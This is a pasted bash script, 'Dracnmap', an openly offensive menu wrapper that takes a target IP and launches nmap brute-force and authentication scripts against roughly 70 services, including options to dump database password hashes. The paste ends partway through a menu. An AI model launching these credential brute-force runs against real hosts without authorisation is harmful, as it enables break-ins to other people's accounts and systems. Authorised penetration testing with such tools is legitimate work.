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Jan 2nd, 2018
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text 128.31 KB | None | 0 0
  1. #!/usr/bin/env bash
  3. #============================================================================================================
  4. # Dracnmap for dracos
  5. #
  6. # Welcome and dont disclaimer
  7. # Dracnmap Author By Edo -maland- a.k.a screetsec
  8. # Tested On Kali Linux and Dracos
  9. # contact me in or
  10. # OS Penetration From Indonesia :
  11. #============================================================================================================
  14. #This colour
  15. cyan='\e[0;36m'
  16. green='\e[0;34m'
  17. okegreen='\033[92m'
  18. lightgreen='\e[1;32m'
  19. white='\e[1;37m'
  20. red='\e[1;31m'
  21. yellow='\e[1;33m'
  22. BlueF='\e[1;34m'
  25. #Variable
  26. Version='2.2'
  27. Codename='Redline'
  28. xterm='xterm -hold -fa monaco -fs 13 -bg black -e nmap'
  29. urxvt='urxvt -hold -e nmap'
  30. output=`pwd`
  33. trap ctrl_c INT
  34. ctrl_c() {
  35. clear
  36. echo -e $red"[*] (Ctrl + C ) Detected, Trying To Exit ..."
  37. sleep 1
  38. echo ""
  39. echo -e $yellow"[*] Thank You For Using Dracnmap =)."
  40. echo ""
  41. echo -e $yellow"[*] Check Dracos Linux LFS, Penetration OS From Indonesia =P."
  42. exit
  43. }
  45. #Bebeku
  46. if [[ $EUID -ne 0 ]]; then
  47. echo "ERROR! Run this script with root user!"
  48. exit 1
  49. fi
  51. if [ -z "${DISPLAY:-}" ]; then
  52. echo -e "\e[1;31mThe script should be executed inside a X (graphical) session."$transparent""
  53. exit 1
  54. fi
  55. resize -s 50 84 > /dev/null
  57. ###############################################
  58. # Checking gaannss
  59. ###############################################
  60. clear
  61. echo -e $okegreen ""
  62. echo -e $okegreen " .___ _______ $red ________ ";
  63. echo -e $okegreen " __| _/___________ ____ \ \ _____ _____ ______ $red ___ _\_____ \ ";
  64. echo -e $okegreen " / __ |\_ __ \__ \ _/ ___\ / | \ / \\__ \ \____ \ $red \ \/ // ____/ ";
  65. echo -e $okegreen "/ /_/ | | | \// __ \\ \___/ | \ Y Y \/ __ \| |_> >$red \ // \ ";
  66. echo -e $okegreen "\____ | |__| (____ /\___ >____|__ /__|_| (____ / __/ $red/\ \_/ \_______ \ ";
  67. echo -e $okegreen " \/ \/ \/ \/ \/ \/|__| $red\/ \/ ";
  68. echo
  69. echo -e $okegreen"-------------------------------------------------------------------------------"
  70. echo -e $lightgreen'-- -- +=[(c) 2016-2017 | | | Pentester Indonesia '
  71. echo -e $cyan'-- -- +=[ Author: Screetsec < Edo Maland > ]=+ -- -- '
  72. echo -e " "
  74. if [ $(id -u) != "0" ]; then
  76. echo [!]::[Check Dependencies] ;
  77. sleep 2
  78. echo [✔]::[Check User]: $USER ;
  79. sleep 1
  80. echo [x]::[not root]: you need to be [root] to run this script.;
  81. echo ""
  82. sleep 1
  83. exit
  86. else
  88. echo [!]::[Check Dependencies]: ;
  89. sleep 1
  90. echo [✔]::[Check User]: $USER ;
  92. fi
  94. ping -c 1 > /dev/null 2>&1
  95. if [ "$?" != 0 ]
  97. then
  99. echo [✔]::[Internet Connection]: DONE!;
  100. echo [x]::[warning]: This Script Needs An Active Internet Connection;
  101. sleep 2
  103. else
  105. echo [✔]::[Internet Connection]: connected!;
  106. sleep 2
  107. fi
  109. # check nmap if exists
  110. which nmap > /dev/null 2>&1
  111. if [ "$?" -eq "0" ]; then
  112. echo [✔]::[nmap]: installation found!;
  113. else
  115. echo [x]::[warning]:this script require Nmap ;
  116. echo ""
  117. echo [!]::[please wait]: please install .... ;
  118. apt-get update
  119. apt-get install nmap
  120. echo ""
  121. sleep 2
  122. exit
  123. fi
  124. sleep 2
  125. # check urxvt if exists
  126. which xterm > /dev/null 2>&1
  127. if [ "$?" -eq "0" ]; then
  128. echo [✔]::[xterm]: installation found!;
  129. else
  131. echo [x]::[warning]:this script require xterm ;
  132. echo ""
  133. echo [!]::[please wait]: please install .... ;
  134. apt-get update
  135. apt-get install xterm
  136. echo ""
  137. sleep 2
  138. exit
  139. fi
  140. sleep 2
  148. ################################################
  149. # OUTPUT FILE
  150. ################################################
  151. function scanoutput() {
  152. echo -e $cyan " "
  153. clear
  154. echo " "
  155. echo " "
  156. echo -e $okegreen" /^--^\ /^--^\ /^--^\ $cyan"
  157. echo -e $okegreen" \____/ \____/ \____/ $cyan "
  158. echo -e $okegreen" / \ / \ / \ $cyan"
  159. echo -e $okegreen" | | | | | | $cyan "
  160. echo -e $okegreen" \__ __/ \__ __/ \__ __/ $cyan MEONG MOEONG "
  161. echo " |^|^|^|^|^|^|^|^|^|^|^|^\ \^|^|^|^/ /^|^|^|^|^\ \^|^|^|^|^|^|^|^|^|^|^|^| "
  162. echo " | | | | | | | | | | | | |\ \| | |/ /| | | | | | \ \ | | | | | | | | | | | "
  163. echo " ########################/ /######\ \###########/ /####################### "
  164. echo " | | | | | | | | | | | | \/| | | | \/| | | | | |\/ | | | | | | | | | | | | "
  165. echo " |_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_| "
  166. echo -e $white " "
  167. echo -e $white" [$okegreen"01"$white]$okegreen OUTPUT SCAN IN XML FORMATS "
  168. echo -e $white" [$okegreen"02"$white]$okegreen OUTPUT SCAN IN HTML FORMATS "
  169. echo -e $white" [$okegreen"03"$white]$okegreen OUTPUT SCAN IN NORMAL FORMATS "
  170. echo -e $white" [$okegreen"04"$white]$okegreen OUTPUT SCAN IN GREPABLE FORMATS "
  171. echo -e $white" [$okegreen"05"$white]$okegreen BACK "
  172. echo -e " "
  173. echo -n -e $red' \033[4mScreetsec@Meoong:\033[0m>> '; tput sgr0 #insert your choice
  174. read DrS
  176. if test $DrS == '1'
  177. then
  178. echo
  179. echo -ne $cyan" Path Location: $HOME/"
  180. echo
  181. echo -ne " Name of Report:"
  182. read namafile
  183. echo
  184. echo -ne " What is your IP Target or Host: "
  185. read ip
  186. echo
  187. $urxvt -A -O -oX $HOME/$namafile.xml $ip &
  188. firefox $HOME/$namafile.xml
  189. elif test $DrS == '2'
  190. then
  191. echo
  192. echo -ne $cyan" Path Location: $HOME/"
  193. echo
  194. echo -ne " Name of Report:"
  195. read namafile
  196. echo
  197. echo -ne " What is your IP Target or Host: "
  198. read ip
  199. echo
  200. $urxvt -A -O -oX $HOME/$namafile.xml $ip &
  201. xsltproc $HOME/$namafile.xml -o $HOME/$namafile.html
  202. firefox $HOME/$namafile.html
  203. elif test $DrS == '3'
  204. then
  205. echo
  206. echo -ne $cyan" Path Location: $HOME/"
  207. echo
  208. echo -ne " Name of Report:"
  209. read namafile
  210. echo
  211. echo -ne " What is your IP Target or Host: "
  212. read ip
  213. echo
  214. $urxvt -F -oN $HOME/$namafile.txt $ip &
  215. nano $HOME/$namafile.txt
  216. elif test $DrS == '4'
  217. then
  218. echo
  219. echo -ne $cyan" Path Location: $HOME/"
  220. echo
  221. echo -ne " Name of Report:"
  222. read namafile
  223. echo
  224. echo -ne " What is your IP Target or Host: "
  225. read ip
  226. echo
  227. $urxvt -F -oG $HOME/$namafile.grep $ip &
  228. nano $HOME/$namafile.grep
  229. elif test $DrS == '5'
  230. then
  231. menu
  232. else
  233. echo -e " Incorrect Number"
  234. fi
  235. echo -n -e " Back to Last Menu? ( Yes / No ) :"
  236. read back
  237. if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ]
  238. then
  239. clear
  240. menu
  241. elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ]
  242. then
  243. scanoutput
  244. fi
  245. }
  248. ################################################
  250. ################################################
  252. function brutense () {
  253. clear
  254. echo " ";
  256. echo -e $white " "
  257. echo -e $white" [$okegreen"01"$white]$cyan afp-brute "
  258. echo -e $white" [$okegreen"02"$white]$cyan ajp-brute "
  259. echo -e $white" [$okegreen"03"$white]$cyan backorifice-brute "
  260. echo -e $white" [$okegreen"04"$white]$cyan cassandra-brute "
  261. echo -e $white" [$okegreen"05"$white]$cyan cics-enum "
  262. echo -e $white" [$okegreen"06"$white]$cyan cics-user-enum "
  263. echo -e $white" [$okegreen"07"$white]$cyan citrix-brute-xml"
  264. echo -e $white" [$okegreen"08"$white]$cyan cvs-brute "
  265. echo -e $white" [$okegreen"09"$white]$cyan cvs-brute-repository "
  266. echo -e $white" [$okegreen"10"$white]$cyan domcon-brute "
  267. echo -e $white" [$okegreen"11"$white]$cyan dpap-enum "
  268. echo -e $white" [$okegreen"12"$white]$cyan drda-brute "
  269. echo -e $white" [$okegreen"13"$white]$cyan ftp-brute "
  270. echo -e $white" [$okegreen"14"$white]$cyan http-from-brute "
  271. echo -e $white" [$okegreen"15"$white]$cyan http-iis-short-name-brute "
  272. echo -e $white" [$okegreen"16"$white]$cyan http-brute "
  273. echo -e $white" [$okegreen"17"$white]$cyan http-joomla-brute "
  274. echo -e $white" [$okegreen"18"$white]$cyan http-proxy-brute "
  275. echo -e $white" [$okegreen"19"$white]$cyan http-wordpress-brute "
  276. echo -e $white" [$okegreen"20"$white]$cyan iax2-brute "
  277. echo -e $white" [$okegreen"21"$white]$cyan informix-brute "
  278. echo -e $white" [$okegreen"22"$white]$cyan ipmi-brute "
  279. echo -e $white" [$okegreen"23"$white]$cyan irc-brute "
  280. echo -e $white" [$okegreen"24"$white]$cyan irc-sasl-brute "
  281. echo -e $white" [$okegreen"25"$white]$cyan iscsi-brute "
  282. echo -e $white" [$okegreen"26"$white]$cyan ldap-brute "
  283. echo -e $white" [$okegreen"27"$white]$cyan imap-brute "
  284. echo -e $white" [$okegreen"28"$white]$cyan membase-brute "
  285. echo -e $white" [$okegreen"29"$white]$cyan mmouse-brute "
  286. echo -e $white" [$okegreen"30"$white]$cyan mongodb-brute "
  287. echo -e $white" [$okegreen"31"$white]$cyan ms-sql-brute "
  288. echo -e $white" [$okegreen"32"$white]$cyan mysql-brute "
  289. echo -e $white" [$okegreen"33"$white]$cyan mysql-enum "
  290. echo -e $white" [$okegreen"34"$white]$cyan mongodb-brute"
  291. echo -e $white" [$okegreen"35"$white]$cyan metasploit-msgrpc-brute "
  292. echo -e $white" [$okegreen"36"$white]$cyan metasploit-xmlrpc-brute "
  293. echo -e $white" [$okegreen"37"$white]$cyan mikrotik-routeros-brute "
  294. echo -e $white" [$okegreen"38"$white]$cyan nessus-xmlrpc-brute "
  295. echo -e $white" [$okegreen"39"$white]$cyan netbus-brute "
  296. echo -e $white" [$okegreen"40"$white]$cyan nexpose-brute "
  297. echo -e $white" [$okegreen"41"$white]$cyan nje-node-brute "
  298. echo -e $white" [$okegreen"42"$white]$cyan nje-pass-brute "
  299. echo -e $white" [$okegreen"43"$white]$cyan nping-brute "
  300. echo -e $white" [$okegreen"44"$white]$cyan nessus-brute "
  301. echo -e $white" [$okegreen"45"$white]$cyan omp2-brute "
  302. echo -e $white" [$okegreen"46"$white]$cyan openvas-otp-brute "
  303. echo -e $white" [$okegreen"47"$white]$cyan oracle-brute "
  304. echo -e $white" [$okegreen"48"$white]$cyan oracle-brute-stealth "
  305. echo -e $white" [$okegreen"49"$white]$cyan oracle-sid-brute "
  306. echo -e $white" [$okegreen"50"$white]$cyan pcanywhere-brute "
  307. echo -e $white" [$okegreen"51"$white]$cyan pgsql-brute "
  308. echo -e $white" [$okegreen"52"$white]$cyan pop3-brute "
  309. echo -e $white" [$okegreen"53"$white]$cyan redis-brute "
  310. echo -e $white" [$okegreen"54"$white]$cyan rexec-brute "
  311. echo -e $white" [$okegreen"55"$white]$cyan rlogin-brute "
  312. echo -e $white" [$okegreen"56"$white]$cyan rpcap-brute "
  313. echo -e $white" [$okegreen"57"$white]$cyan rsync-brute "
  314. echo -e $white" [$okegreen"58"$white]$cyan rtsp-url-brute "
  315. echo -e $white" [$okegreen"59"$white]$cyan sip-brute "
  316. echo -e $white" [$okegreen"60"$white]$cyan socks-brute "
  317. echo -e $white" [$okegreen"61"$white]$cyan svn-brute "
  318. echo -e $white" [$okegreen"62"$white]$cyan tso-enum "
  319. echo -e $white" [$okegreen"63"$white]$cyan smb-brute "
  320. echo -e $white" [$okegreen"64"$white]$cyan smtp-brute "
  321. echo -e $white" [$okegreen"65"$white]$cyan snmp-brute "
  322. echo -e $white" [$okegreen"66"$white]$cyan telnet-brute "
  323. echo -e $white" [$okegreen"67"$white]$cyan vtam-enum "
  324. echo -e $white" [$okegreen"68"$white]$cyan vmauthd-brute "
  325. echo -e $white" [$okegreen"69"$white]$cyan vnc-brute"
  326. echo -e $white" [$okegreen"70"$white]$cyan xmpp-brute "
  327. echo -e $white" [$okegreen"71"$white]$cyan Back "
  328. echo -e " "
  329. echo -n -e $red' \033[4mScreetsec@nse-brute:\033[0m>> '; tput sgr0 #insert your choice
  330. read Brute
  331. if test $Brute == '1'
  332. then
  333. echo
  334. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  335. read ip
  336. echo -ne $okegreen " Open Port on Target or Host: " ; tput sgr0
  337. read port
  338. $urxvt -p $port --script afp-brute $ip &
  339. elif test $Brute == '2'
  340. then
  341. echo
  342. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  343. read ip
  344. echo -ne $okegreen " Open Port on Target or Host: " ; tput sgr0
  345. read port
  346. $urxvt -p $port $ip --script ajp-brute &
  347. elif test $Brute == '3'
  348. then
  349. echo
  350. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  351. read ip
  352. echo -ne $okegreen " Open Port on Target or Host: " ; tput sgr0
  353. read port
  354. $urxvt -sU --script backorifice-brute $ip --script-args backorifice-brute.ports=$port &
  355. elif test $Brute == '4'
  356. then
  357. echo
  358. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  359. read ip
  360. $urxvt -p 9160 $ip --script=cassandra-brute &
  361. elif test $Brute == '5'
  362. then
  363. echo
  364. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  365. read ip
  366. $urxvt --script=cics-enum -p 23 $ip &
  367. elif test $Brute == '6'
  368. then
  369. echo
  370. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  371. read ip
  372. $urxvt --script=cics-user-enum -p 23 $ip &
  373. elif test $Brute == '7'
  374. then
  375. echo
  376. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  377. read ip
  378. echo -ne $okegreen " What Userdb " ; tput sgr0
  379. read userdb
  380. echo -ne $okegreen " What Passdb " ; tput sgr0
  381. read passdb
  382. echo -ne $okegreen " What domain " ; tput sgr0
  383. read domain
  384. $urxvt --script=citrix-brute-xml --script-args=userdb=$userdb,passdb=$passdb,ntdomain=$domain -p 80,443,8080 $ip &
  385. elif test $Brute == '8'
  386. then
  387. echo
  388. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  389. read ip
  390. $urxvt -p 2401 --script cvs-brute $ip &
  391. elif test $Brute == '9'
  392. then
  393. echo
  394. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  395. read ip
  396. $urxvt -p 2401 --script cvs-brute-repository $ip &
  397. elif test $Brute == '10'
  398. then
  399. echo
  400. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  401. read ip
  402. $urxvt --script domcon-brute -p 2050 $ip &
  403. elif test $Brute == '11'
  404. then
  405. echo
  406. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  407. read ip
  408. $urxvt --script dpap-brute -p 8770 $ip &
  409. elif test $Brute == '12'
  410. then
  411. echo
  412. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  413. read ip
  414. $urxvt -p 50000 --script drda-brute $ip &
  415. elif test $Brute == '13'
  416. then
  417. echo
  418. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  419. read ip
  420. echo -ne $okegreen " Open Port on Target or Host: " ; tput sgr0
  421. read port
  422. $urxvt --script ftp-brute -p $port $ip &
  423. elif test $Brute == '14'
  424. then
  425. echo
  426. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  427. read ip
  428. $urxvt --script http-form-brute -p 80 $ip &
  429. elif test $Brute == '15'
  430. then
  431. echo
  432. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  433. read ip
  434. $urxvt -p80 --script http-iis-short-name-brute $ip &
  435. elif test $Brute == '16'
  436. then
  437. echo
  438. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  439. read ip
  440. echo -ne $okegreen " Open Port on Target or Host: " ; tput sgr0
  441. read port
  442. $urxvt --script http-brute -p $port $ip &
  443. elif test $Brute == '17'
  444. then
  445. echo
  446. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  447. read ip
  448. $urxvt -sV --script http-joomla-brute $ip &
  449. elif test $Brute == '18'
  450. then
  451. echo
  452. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  453. read ip
  454. $urxvt --script http-proxy-brute -p 8080 $ip &
  455. elif test $Brute == '19'
  456. then
  457. echo
  458. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  459. read ip
  460. $urxvt -sV --script http-wordpress-brute $ip &
  461. elif test $Brute == '20'
  462. then
  463. echo
  464. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  465. read ip
  466. $urxvt -sU -p 4569 $ip --script iax2-brute &
  467. elif test $Brute == '21'
  468. then
  469. echo
  470. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  471. read ip
  472. $urxvt --script informix-brute -p 9088 $ip &
  473. elif test $Brute == '22'
  474. then
  475. echo
  476. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  477. read ip
  478. $urxvt -sU --script ipmi-brute -p 623 $ip &
  479. elif test $Brute == '23'
  480. then
  481. echo
  482. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  483. read ip
  484. $urxvt --script irc-brute -p 6667 $ip &
  485. elif test $Brute == '24'
  486. then
  487. echo
  488. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  489. read ip
  490. $urxvt --script irc-sasl-brute -p 6667 $ip &
  491. elif test $Brute == '25'
  492. then
  493. echo
  494. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  495. read ip
  496. $urxvt -sV --script=iscsi-brute $ip &
  497. elif test $Brute == '26'
  498. then
  499. echo
  500. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  501. read ip
  502. $urxvt -p 389 --script ldap-brute --script-args ldap.base='"cn=users,dc=cqure,dc=net"' $ip &
  503. elif test $Brute == '27'
  504. then
  505. echo
  506. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  507. read ip
  508. $urxvt -p 143,993 --script imap-brute $ip &
  509. elif test $Brute == '28'
  510. then
  511. echo
  512. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  513. read ip
  514. $urxvt -p 11211 --script membase-brute &
  515. elif test $Brute == '29'
  516. then
  517. echo
  518. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  519. read ip
  520. $urxvt --script mmouse-brute -p 51010 $ip &
  521. elif test $Brute == '30'
  522. then
  523. echo
  524. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  525. read ip
  526. $urxvt -p 27017 $ip --script mongodb-brute &
  527. elif test $Brute == '31'
  528. then
  529. echo
  530. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  531. read ip
  532. $urxvt -p 445 --script ms-sql-brute --script-args mssql.instance-all,userdb=customuser.txt,passdb=custompass.txt $ip &
  533. elif test $Brute == '32'
  534. then
  535. echo
  536. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  537. read ip
  538. $urxvt --script=mysql-brute $ip
  539. elif test $Brute == '33'
  540. then
  541. echo
  542. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  543. read ip
  544. nmap --script=mysql-enum $ip &
  545. elif test $Brute == '34'
  546. then
  547. echo
  548. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  549. read ip
  550. $urxvt -p 27017 $ip --script mongodb-brute &
  551. elif test $Brute == '35'
  552. then
  553. echo
  554. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  555. read ip
  556. $urxvt --script metasploit-msgrpc-brute -p 55553 $ip &
  557. elif test $Brute == '36'
  558. then
  559. echo
  560. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  561. read ip
  562. $urxvt --script metasploit-xmlrpc-brute -p 55553 $ip &
  563. elif test $Brute == '37'
  564. then
  565. echo
  566. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  567. read ip
  568. $urxvt -p 8728 --script mikrotik-routeros-brute $ip &
  569. elif test $Brute == '38'
  570. then
  571. echo
  572. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  573. read ip
  574. $urxvt -sV --script=nessus-xmlrpc-brute $ip &
  575. elif test $Brute == '39'
  576. then
  577. echo
  578. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  579. read ip
  580. $urxvt -p 12345 --script netbus-brute $ip &
  581. elif test $Brute == '40'
  582. then
  583. echo
  584. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  585. read ip
  586. $urxvt --script nexpose-brute -p 3780 $ip &
  587. elif test $Brute == '41'
  588. then
  589. echo
  590. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  591. read ip
  592. $urxvt -sV --script=nje-node-brute $ip &
  593. elif test $Brute == '42'
  594. then
  595. echo
  596. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  597. read ip
  598. $urxvt --script=nje-pass-brute --script-args=ohost='POTATO',rhost='CACTUS',sleep=5 -p 175 $ip &
  599. elif test $Brute == '43'
  600. then
  601. echo
  602. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  603. read ip
  604. $urxvt -p 9929 --script nping-brute $ip &
  605. elif test $Brute == '44'
  606. then
  607. echo
  608. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  609. read ip
  610. $urxvt --script nessus-brute -p 1241 $ip &
  611. elif test $Brute == '45'
  612. then
  613. echo
  614. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  615. read ip
  616. $urxvt -p 9390 --script omp2-brute $ip &
  617. elif test $Brute == '46'
  618. then
  619. echo
  620. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  621. read ip
  622. $urxvt -sV --script=openvas-otp-brute $ip &
  623. elif test $Brute == '47'
  624. then
  625. echo
  626. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  627. read ip
  628. $urxvt --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL $ip &
  629. elif test $Brute == '48'
  630. then
  631. echo
  632. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  633. read ip
  634. $urxvt --script oracle-brute-stealth -p 1521 --script-args oracle-brute-stealth.sid=ORCL $ip &
  635. elif test $Brute == '49'
  636. then
  637. echo
  638. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  639. read ip
  640. $urxvt --script=oracle-sid-brute -p 1521-1560 $ip &
  641. elif test $Brute == '50'
  642. then
  643. echo
  644. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  645. read ip
  646. $urxvt --script=pcanywhere-brute $ip &
  647. elif test $Brute == '51'
  648. then
  649. echo
  650. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  651. read ip
  652. $urxvt -p 5432 --script pgsql-brute $ip &
  653. elif test $Brute == '52'
  654. then
  655. echo
  656. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  657. read ip
  658. $urxvt -sV --script=pop3-brute $ip &
  659. elif test $Brute == '53'
  660. then
  661. echo
  662. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  663. read ip
  664. $urxvt -p 6379 $ip --script redis-brute &
  665. elif test $Brute == '54'
  666. then
  667. echo
  668. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  669. read ip
  670. $urxvt -p 512 --script rexec-brute $ip &
  671. elif test $Brute == '55'
  672. then
  673. echo
  674. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  675. read ip
  676. $urxvt -p 513 --script rlogin-brute $ip &
  677. elif test $Brute == '56'
  678. then
  679. echo
  680. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  681. read ip
  682. $urxvt -p 2002 $ip --script rpcap-brute &
  683. elif test $Brute == '57'
  684. then
  685. echo
  686. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  687. read ip
  688. $urxvt -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' $ip &
  689. elif test $Brute == '58'
  690. then
  691. echo
  692. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  693. read ip
  694. $urxvt --script rtsp-url-brute -p 554 $ip &
  695. elif test $Brute == '59'
  696. then
  697. echo
  698. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  699. read ip
  700. $urxvt -sU -p 5060 $ip --script=sip-brute &
  701. elif test $Brute == '60'
  702. then
  703. echo
  704. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  705. read ip
  706. $urxvt --script socks-brute -p 1080 $ip &
  707. elif test $Brute == '61'
  708. then
  709. echo
  710. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  711. read ip
  712. $urxvt --script svn-brute --script-args svn-brute.repo=/svn/ -p 3690 $ip &
  713. elif test $Brute == '62'
  714. then
  715. echo
  716. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  717. read ip
  718. $urxvt --script=tso-enum -p 23 $ip &
  719. elif test $Brute == '63'
  720. then
  721. echo
  722. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  723. read ip
  724. $urxvt -sU -sS --script smb-brute.nse -p U:137,T:139 &
  725. elif test $Brute == '64'
  726. then
  727. echo
  728. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  729. read ip
  730. $urxvt -p 25 --script smtp-brute $ip &
  731. elif test $Brute == '65'
  732. then
  733. echo
  734. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  735. read ip
  736. echo -ne $okegreen " Located Wordlist ? : " ; tput sgr0
  737. read wordlist
  738. $urxvt -sU --script snmp-brute $ip [--script-args snmp-brute.communitiesdb=$wordlist ] &
  739. elif test $Brute == '66'
  740. then
  741. echo
  742. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  743. read ip
  744. echo -ne $okegreen " Open Port on Target or Host (23): " ; tput sgr0
  745. read port
  746. $urxvt -p $port --script telnet-brute --script-args userdb=myusers.lst,passdb=mypwds.lst,telnet-brute.timeout=8s $ip &
  747. elif test $Brute == '67'
  748. then
  749. echo
  750. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  751. read ip
  752. $urxvt --script vtam-enum -p 23 $ip &
  753. elif test $Brute == '68'
  754. then
  755. echo
  756. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  757. read ip
  758. $urxvt -p 902 $ip --script vmauthd-brute &
  759. elif test $Brute == '69'
  760. then
  761. echo
  762. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  763. read ip
  764. $urxvt --script vnc-brute -p 5900 $ip &
  765. elif test $Brute == '70'
  766. then
  767. echo
  768. echo -ne $okegreen " What is your IP Target or Host: " ; tput sgr0
  769. read ip
  770. $urxvt -p 5222 --script xmpp-brute $ip &
  771. elif test $Brute == '71'
  772. then
  773. nse
  774. else
  775. echo ""
  776. echo -e $okegreen " Incorrect Number"
  777. fi
  778. echo ""
  779. echo ""
  780. echo -n -e $red " Back to Last Menu? ( Yes / No ) :"
  781. read back
  782. if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'no' ] && [ $back != 'No' ]
  783. then
  784. clear
  785. menu
  786. elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'yes' ] && [ $back != 'Yes' ]
  787. then
  788. brutense
  789. fi
  790. }
  792. function auth () {
  793. clear
  794. echo
  795. echo
  796. echo -e $white" [$okegreen"01"$white]$cyan ajp-auth "
  797. echo -e $white" [$okegreen"02"$white]$cyan creds-summary "
  798. echo -e $white" [$okegreen"03"$white]$cyan domcon-cmd "
  799. echo -e $white" [$okegreen"04"$white]$cyan domino-enum-users "
  800. echo -e $white" [$okegreen"05"$white]$cyan ftp-anon "
  801. echo -e $white" [$okegreen"06"$white]$cyan http-auth "
  802. echo -e $white" [$okegreen"07"$white]$cyan http-barracuda-dir-traversal "
  803. echo -e $white" [$okegreen"08"$white]$cyan http-config-backup "
  804. echo -e $white" [$okegreen"09"$white]$cyan http-default-accounts "
  805. echo -e $white" [$okegreen"10"$white]$cyan http-domino-enum-passwords "
  806. echo -e $white" [$okegreen"11"$white]$cyan http-method-tamper "
  807. echo -e $white" [$okegreen"12"$white]$cyan http-userdir-enum "
  808. echo -e $white" [$okegreen"13"$white]$cyan http-vuln-cve2010-0738 "
  809. echo -e $white" [$okegreen"14"$white]$cyan http-wordpress-users "
  810. echo -e $white" [$okegreen"15"$white]$cyan informix-query "
  811. echo -e $white" [$okegreen"16"$white]$cyan informix-tables "
  812. echo -e $white" [$okegreen"17"$white]$cyan krb5-enum-users "
  813. echo -e $white" [$okegreen"18"$white]$cyan ms-sql-dump-hashes"
  814. echo -e $white" [$okegreen"19"$white]$cyan ms-sql-empty-password "
  815. echo -e $white" [$okegreen"20"$white]$cyan ms-sql-hasdbaccess "
  816. echo -e $white" [$okegreen"21"$white]$cyan mysql-dump-hashes "
  817. echo -e $white" [$okegreen"22"$white]$cyan mysql-empty-password "
  818. echo -e $white" [$okegreen"23"$white]$cyan mysql-query "
  819. echo -e $white" [$okegreen"24"$white]$cyan mysql-users "
  820. echo -e $white" [$okegreen"25"$white]$cyan ncp-enum-users "
